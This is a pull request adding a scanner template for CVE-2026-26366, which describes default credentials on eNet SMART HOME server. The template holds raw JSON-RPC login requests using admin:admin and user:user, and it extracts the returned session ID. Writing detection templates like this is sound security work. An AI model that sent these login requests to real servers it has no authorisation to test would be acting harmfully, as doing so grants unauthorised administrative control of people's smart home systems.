### PR TITLE
Add CVE-2026-26366 - eNet SMART HOME Server Default Credentials

### DIFF
--- a/http/cves/2026/CVE-2026-26366.yaml
+++ b/http/cves/2026/CVE-2026-26366.yaml
@@ -1,0 +1,66 @@
+id: CVE-2026-26366
+
+info:
+  name: eNet SMART HOME Server - Default Credentials
+  author: Bushi-gg
+  severity: critical
+  description: |
+    eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) that remain active after installation and commissioning without enforcing a mandatory password change. Unauthenticated attackers can use these default credentials to gain administrative access to sensitive smart home configuration and control functions.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-26366
+    - https://www.vulncheck.com/advisories/jung-enet-smart-home-server-use-of-default-credent
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5972.php
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-26366
+    cwe-id: CWE-1392
+  metadata:
+    verified: false
+    max-request: 2
+    vendor: jung
+    product: enet-smart-home-server
+  tags: cve,cve2026,default-login,enet,iot
+
+http:
+  - raw:
+      - |
+        POST /jsonrpc/management HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"jsonrpc":"2.0","method":"login","params":{"userName":"admin","password":"admin"},"id":1}
+
+      - |
+        POST /jsonrpc/management HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"jsonrpc":"2.0","method":"login","params":{"userName":"user","password":"user"},"id":2}
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '"result"'
+          - '"sessionId"'
+        condition: and
+
+      - type: word
+        part: body
+        negative: true
+        words:
+          - '"error"'
+
+    extractors:
+      - type: json
+        name: sessionId
+        part: body
+        json:
+          - '.result.sessionId'


### PR DESCRIPTION
## CVE-2026-26366 - eNet SMART HOME Server Default Credentials

eNet SMART HOME server 2.2.1 and 2.3.1 ships with default credentials (user:user, admin:admin) enabling unauthorized access.

- **CVSS:** 9.8 Critical
- **CWE:** CWE-1392
- **Reference:** https://nvd.nist.gov/vuln/detail/CVE-2026-26366